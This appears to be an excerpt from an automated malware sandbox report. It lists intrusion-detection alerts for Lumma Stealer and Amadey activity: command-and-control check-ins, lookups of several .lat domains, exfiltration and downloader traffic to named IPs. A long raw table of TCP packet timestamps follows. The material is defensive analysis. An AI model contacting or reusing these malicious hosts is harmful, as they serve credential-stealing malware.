                                                                                                                                                                                                                                        2024-12-19T06:10:02.629214+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449896104.21.66.85443TCP
                                                                                                                                                                                                                                        2024-12-19T06:10:03.424516+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449896104.21.66.85443TCP
                                                                                                                                                                                                                                        2024-12-19T06:10:03.424516+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449896104.21.66.85443TCP
                                                                                                                                                                                                                                        2024-12-19T06:10:06.259068+01002058355ET MALWARE Observed Win32/Lumma Stealer Related Domain (aspecteirs .lat in TLS SNI)1192.168.2.449904104.21.66.85443TCP
                                                                                                                                                                                                                                        2024-12-19T06:10:06.259068+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449904104.21.66.85443TCP
                                                                                                                                                                                                                                        2024-12-19T06:10:07.272105+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.449908185.215.113.4380TCP
                                                                                                                                                                                                                                        2024-12-19T06:10:07.423552+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449904104.21.66.85443TCP
                                                                                                                                                                                                                                        2024-12-19T06:10:09.176191+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44991031.41.244.1180TCP
                                                                                                                                                                                                                                        2024-12-19T06:10:09.256260+01002058355ET MALWARE Observed Win32/Lumma Stealer Related Domain (aspecteirs .lat in TLS SNI)1192.168.2.449915104.21.66.85443TCP
                                                                                                                                                                                                                                        2024-12-19T06:10:09.256260+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449915104.21.66.85443TCP
                                                                                                                                                                                                                                        2024-12-19T06:10:09.378332+01002058378ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat)1192.168.2.4532371.1.1.153UDP
                                                                                                                                                                                                                                        2024-12-19T06:10:09.606669+01002058364ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat)1192.168.2.4586871.1.1.153UDP
                                                                                                                                                                                                                                        2024-12-19T06:10:11.245334+01002058365ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)1192.168.2.449918104.21.64.80443TCP
                                                                                                                                                                                                                                        2024-12-19T06:10:11.245334+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449918104.21.64.80443TCP
                                                                                                                                                                                                                                        2024-12-19T06:10:11.463654+01002058355ET MALWARE Observed Win32/Lumma Stealer Related Domain (aspecteirs .lat in TLS SNI)1192.168.2.449922104.21.66.85443TCP
                                                                                                                                                                                                                                        2024-12-19T06:10:11.463654+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449922104.21.66.85443TCP
                                                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:04.039057016 CET4974880192.168.2.4185.215.113.43
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:04.158901930 CET8049748185.215.113.43192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:04.158987999 CET4974880192.168.2.4185.215.113.43
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:04.159213066 CET4974880192.168.2.4185.215.113.43
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:04.278711081 CET8049748185.215.113.43192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:05.497010946 CET8049748185.215.113.43192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:05.500049114 CET4974880192.168.2.4185.215.113.43
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:07.005115032 CET4974880192.168.2.4185.215.113.43
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:07.005490065 CET4975480192.168.2.4185.215.113.43
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:07.178447008 CET8049754185.215.113.43192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:07.178483009 CET8049748185.215.113.43192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:07.178546906 CET4975480192.168.2.4185.215.113.43
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:07.178581953 CET4974880192.168.2.4185.215.113.43
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:07.178826094 CET4975480192.168.2.4185.215.113.43
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:07.298535109 CET8049754185.215.113.43192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:09.829411983 CET8049754185.215.113.43192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:09.829528093 CET4975480192.168.2.4185.215.113.43
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:09.829545021 CET8049754185.215.113.43192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:09.829687119 CET4975480192.168.2.4185.215.113.43
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:10.063214064 CET8049754185.215.113.43192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:10.063322067 CET4975480192.168.2.4185.215.113.43
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:10.067841053 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:10.187475920 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:10.187711954 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:10.187891960 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:10.307411909 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.524941921 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.525006056 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.525018930 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.525037050 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.525065899 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.525091887 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.525105953 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.525139093 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.525156975 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.525171995 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.525177956 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.525207996 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.525240898 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.525242090 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.525262117 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.525275946 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.525304079 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.525310993 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.525330067 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.525352955 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.644917965 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.645024061 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.645092010 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.645133018 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.649030924 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.649096966 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.649137020 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.649203062 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.717210054 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.717295885 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.717324018 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.717389107 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.721447945 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.721540928 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.721586943 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.721649885 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.729912996 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.729975939 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.730056047 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.730112076 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.738250971 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.738312960 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.738395929 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.738454103 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.746592999 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.746670008 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.746732950 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.746783018 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.755009890 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.755079031 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.755111933 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.755163908 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.763375044 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.763456106 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.763510942 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.763567924 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.771789074 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.771857023 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.771893978 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.771939039 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.780190945 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.780277014 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.780302048 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.780350924 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.788543940 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.788611889 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.788669109 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.788718939 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.795833111 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.795897007 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.795969009 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.796027899 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.803025007 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.803116083 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.803148031 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.803201914 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.909265995 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.909400940 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.909468889 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.909579039 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.911519051 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.911590099 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.911653042 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.911706924 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.915999889 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.916060925 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.916114092 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.916172028 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.920530081 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.920664072 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.920675993 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.920758009 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.925112963 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.925177097 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.925194025 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.925247908 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.929542065 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.929603100 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.929687977 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.929744005 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.934082031 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.934137106 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.934139967 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.934196949 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.938524961 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.938582897 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.938652992 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.938708067 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.943017960 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.943085909 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.943147898 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.943208933 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.947556973 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.947619915 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.947659016 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.947714090 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.952028036 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.952090025 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.952168941 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.952224970 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.956585884 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.956644058 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.956717014 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.956777096 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.961031914 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.961100101 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.961177111 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.961232901 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.965507984 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.965564013 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.965627909 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.965691090 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.970038891 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.970092058 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.970101118 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.970149040 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.974493980 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.974558115 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.974608898 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.974668026 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.979005098 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.979079008 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.979118109 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.979176044 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.983467102 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.983529091 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.983575106 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.983644009 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.987948895 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.988010883 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.988040924 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:11.988095999 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.101494074 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.101576090 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.101702929 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.101762056 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.103305101 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.103372097 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.103425026 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.103480101 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.106991053 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.107062101 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.107115030 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.107171059 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.110589981 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.110646009 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.110730886 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.110781908 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.114083052 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.114144087 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.114223957 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.114286900 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.117592096 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.117656946 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.117741108 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.117803097 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.120996952 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.121069908 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.121139050 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.121198893 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.124392986 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.124456882 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.124517918 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.124574900 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.127933025 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.128005028 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.128021955 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.128082037 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.131203890 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.131278038 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.131362915 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.131426096 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.134629011 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.134701967 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.134742022 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.134800911 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.137995958 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.138046980 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.138144016 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.138190985 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.141453981 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.141524076 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.141561985 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.141619921 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.144815922 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.144882917 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.144965887 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.145028114 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.148247004 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.148303032 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.148384094 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.148437023 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.151624918 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.151690960 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.151753902 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.151813984 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.155009985 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.155066967 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.155148983 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.155204058 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.158456087 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.158557892 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.158561945 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.158603907 CET4976380192.168.2.431.41.244.11
